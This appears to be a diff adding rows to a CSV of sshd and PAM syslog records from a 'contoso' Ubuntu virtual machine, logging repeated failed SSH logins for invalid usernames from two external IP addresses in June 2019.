+12006,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:49:22,UbuntuDevEnv,2019-06-26 01:49:21,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 15850:11: Bye Bye [preauth],91346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,15850,,
+12007,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:49:22,UbuntuDevEnv,2019-06-26 01:49:21,auth,UbuntuDevEnv,info,Disconnected from invalid user git_user 131.108.48.151 port 15850 [preauth],91346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,131.108.48.1,15850,,
+12008,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:50:48,UbuntuDevEnv,2019-06-26 01:50:48,auth,UbuntuDevEnv,info,Invalid user tinkerware from 51.77.140.111 port 43908,91664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tinkerware,51.77.140.1,43908,,
+12009,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:50:48,UbuntuDevEnv,2019-06-26 01:50:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12010,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:50:48,UbuntuDevEnv,2019-06-26 01:50:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,91664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+12011,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:50:50,UbuntuDevEnv,2019-06-26 01:50:50,auth,UbuntuDevEnv,info,Failed password for invalid user tinkerware from 51.77.140.111 port 43908 ssh2,91664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tinkerware,51.77.140.1,43908,,
+12012,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:50:50,UbuntuDevEnv,2019-06-26 01:50:50,auth,UbuntuDevEnv,info,Disconnected from invalid user tinkerware 51.77.140.111 port 43908 [preauth],91664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tinkerware,51.77.140.1,43908,,
+12013,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:50:50,UbuntuDevEnv,2019-06-26 01:50:50,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 43908:11: Bye Bye [preauth],91664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,43908,,
+12014,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:51:19,UbuntuDevEnv,2019-06-26 01:51:19,auth,UbuntuDevEnv,info,Invalid user w from 131.108.48.151 port 24421,91774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,w,131.108.48.1,24421,,
+12015,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:51:19,UbuntuDevEnv,2019-06-26 01:51:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12016,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:51:19,UbuntuDevEnv,2019-06-26 01:51:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,91774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+12017,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:51:22,UbuntuDevEnv,2019-06-26 01:51:21,auth,UbuntuDevEnv,info,Failed password for invalid user w from 131.108.48.151 port 24421 ssh2,91774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,w,131.108.48.1,24421,,
+12018,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:51:22,UbuntuDevEnv,2019-06-26 01:51:22,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 24421:11: Bye Bye [preauth],91774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,24421,,
+12019,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:51:22,UbuntuDevEnv,2019-06-26 01:51:22,auth,UbuntuDevEnv,info,Disconnected from invalid user w 131.108.48.151 port 24421 [preauth],91774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,w,131.108.48.1,24421,,
+12020,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:52:18,UbuntuDevEnv,2019-06-26 01:52:18,auth,UbuntuDevEnv,info,Invalid user ts2 from 51.77.140.111 port 60866,91986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts2,51.77.140.1,60866,,
+12021,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:52:18,UbuntuDevEnv,2019-06-26 01:52:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12022,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:52:18,UbuntuDevEnv,2019-06-26 01:52:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,91986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+12023,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:52:21,UbuntuDevEnv,2019-06-26 01:52:20,auth,UbuntuDevEnv,info,Failed password for invalid user ts2 from 51.77.140.111 port 60866 ssh2,91986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts2,51.77.140.1,60866,,
+12024,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:52:21,UbuntuDevEnv,2019-06-26 01:52:20,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 60866:11: Bye Bye [preauth],91986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,60866,,
+12025,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:52:21,UbuntuDevEnv,2019-06-26 01:52:20,auth,UbuntuDevEnv,info,Disconnected from invalid user ts2 51.77.140.111 port 60866 [preauth],91986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts2,51.77.140.1,60866,,
+12026,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:53:16,UbuntuDevEnv,2019-06-26 01:53:15,auth,UbuntuDevEnv,info,Invalid user git from 131.108.48.151 port 32967,92190,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,131.108.48.1,32967,,
+12027,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:53:16,UbuntuDevEnv,2019-06-26 01:53:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92190,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12028,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:53:16,UbuntuDevEnv,2019-06-26 01:53:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,92190,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+12029,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:53:19,UbuntuDevEnv,2019-06-26 01:53:18,auth,UbuntuDevEnv,info,Failed password for invalid user git from 131.108.48.151 port 32967 ssh2,92190,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,131.108.48.1,32967,,
+12030,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:53:19,UbuntuDevEnv,2019-06-26 01:53:18,auth,UbuntuDevEnv,info,Disconnected from invalid user git 131.108.48.151 port 32967 [preauth],92190,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,131.108.48.1,32967,,
+12031,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:53:19,UbuntuDevEnv,2019-06-26 01:53:18,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 32967:11: Bye Bye [preauth],92190,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,32967,,
+12032,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:53:47,UbuntuDevEnv,2019-06-26 01:53:47,auth,UbuntuDevEnv,info,Invalid user varnish from 51.77.140.111 port 49594,92298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,varnish,51.77.140.1,49594,,
+12033,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:53:47,UbuntuDevEnv,2019-06-26 01:53:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12034,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:53:47,UbuntuDevEnv,2019-06-26 01:53:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,92298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+12035,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:53:49,UbuntuDevEnv,2019-06-26 01:53:48,auth,UbuntuDevEnv,info,Failed password for invalid user varnish from 51.77.140.111 port 49594 ssh2,92298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,varnish,51.77.140.1,49594,,
+12036,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:53:49,UbuntuDevEnv,2019-06-26 01:53:48,auth,UbuntuDevEnv,info,Disconnected from invalid user varnish 51.77.140.111 port 49594 [preauth],92298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,varnish,51.77.140.1,49594,,
+12037,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:53:49,UbuntuDevEnv,2019-06-26 01:53:48,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 49594:11: Bye Bye [preauth],92298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,49594,,
+12038,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:55:12,UbuntuDevEnv,2019-06-26 01:55:12,auth,UbuntuDevEnv,info,Invalid user vweru from 131.108.48.151 port 41522,92604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vweru,131.108.48.1,41522,,
+12039,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:55:12,UbuntuDevEnv,2019-06-26 01:55:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,92604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+12040,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:55:12,UbuntuDevEnv,2019-06-26 01:55:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12041,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:55:14,UbuntuDevEnv,2019-06-26 01:55:14,auth,UbuntuDevEnv,info,Failed password for invalid user vweru from 131.108.48.151 port 41522 ssh2,92604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vweru,131.108.48.1,41522,,
+12042,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:55:14,UbuntuDevEnv,2019-06-26 01:55:14,auth,UbuntuDevEnv,info,Disconnected from invalid user vweru 131.108.48.151 port 41522 [preauth],92604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vweru,131.108.48.1,41522,,
+12043,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:55:14,UbuntuDevEnv,2019-06-26 01:55:14,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 41522:11: Bye Bye [preauth],92604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,41522,,
+12044,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:55:19,UbuntuDevEnv,2019-06-26 01:55:18,auth,UbuntuDevEnv,info,Invalid user br from 51.77.140.111 port 38324,92624,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,br,51.77.140.1,38324,,
+12045,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:55:19,UbuntuDevEnv,2019-06-26 01:55:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,92624,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+12046,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:55:19,UbuntuDevEnv,2019-06-26 01:55:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92624,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12047,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:55:20,UbuntuDevEnv,2019-06-26 01:55:20,auth,UbuntuDevEnv,info,Failed password for invalid user br from 51.77.140.111 port 38324 ssh2,92624,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,br,51.77.140.1,38324,,
+12048,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:55:20,UbuntuDevEnv,2019-06-26 01:55:20,auth,UbuntuDevEnv,info,Disconnected from invalid user br 51.77.140.111 port 38324 [preauth],92624,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,br,51.77.140.1,38324,,
+12049,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:55:20,UbuntuDevEnv,2019-06-26 01:55:20,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 38324:11: Bye Bye [preauth],92624,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,38324,,
+12050,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:56:47,UbuntuDevEnv,2019-06-26 01:56:46,auth,UbuntuDevEnv,info,Invalid user ADONIS from 51.77.140.111 port 55282,92937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ADONIS,51.77.140.1,55282,,
+12051,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:56:47,UbuntuDevEnv,2019-06-26 01:56:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12052,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:56:47,UbuntuDevEnv,2019-06-26 01:56:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,92937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+12053,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:56:49,UbuntuDevEnv,2019-06-26 01:56:49,auth,UbuntuDevEnv,info,Failed password for invalid user ADONIS from 51.77.140.111 port 55282 ssh2,92937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ADONIS,51.77.140.1,55282,,
+12054,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:56:49,UbuntuDevEnv,2019-06-26 01:56:49,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 55282:11: Bye Bye [preauth],92937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,55282,,
+12055,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:56:49,UbuntuDevEnv,2019-06-26 01:56:49,auth,UbuntuDevEnv,info,Disconnected from invalid user ADONIS 51.77.140.111 port 55282 [preauth],92937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ADONIS,51.77.140.1,55282,,
+12056,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:57:11,UbuntuDevEnv,2019-06-26 01:57:11,auth,UbuntuDevEnv,info,Invalid user sshvpn from 131.108.48.151 port 50079,93027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sshvpn,131.108.48.1,50079,,
+12057,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:57:11,UbuntuDevEnv,2019-06-26 01:57:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12058,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:57:11,UbuntuDevEnv,2019-06-26 01:57:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,93027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+12059,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:57:13,UbuntuDevEnv,2019-06-26 01:57:13,auth,UbuntuDevEnv,info,Failed password for invalid user sshvpn from 131.108.48.151 port 50079 ssh2,93027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sshvpn,131.108.48.1,50079,,
+12060,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:57:13,UbuntuDevEnv,2019-06-26 01:57:13,auth,UbuntuDevEnv,info,Disconnected from invalid user sshvpn 131.108.48.151 port 50079 [preauth],93027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sshvpn,131.108.48.1,50079,,
+12061,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:57:13,UbuntuDevEnv,2019-06-26 01:57:13,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 50079:11: Bye Bye [preauth],93027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,50079,,
+12062,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:58:16,UbuntuDevEnv,2019-06-26 01:58:16,auth,UbuntuDevEnv,info,Invalid user wms from 51.77.140.111 port 44008,93258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wms,51.77.140.1,44008,,
+12063,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:58:16,UbuntuDevEnv,2019-06-26 01:58:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12064,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:58:16,UbuntuDevEnv,2019-06-26 01:58:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,93258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+12065,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:58:18,UbuntuDevEnv,2019-06-26 01:58:18,auth,UbuntuDevEnv,info,Failed password for invalid user wms from 51.77.140.111 port 44008 ssh2,93258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wms,51.77.140.1,44008,,
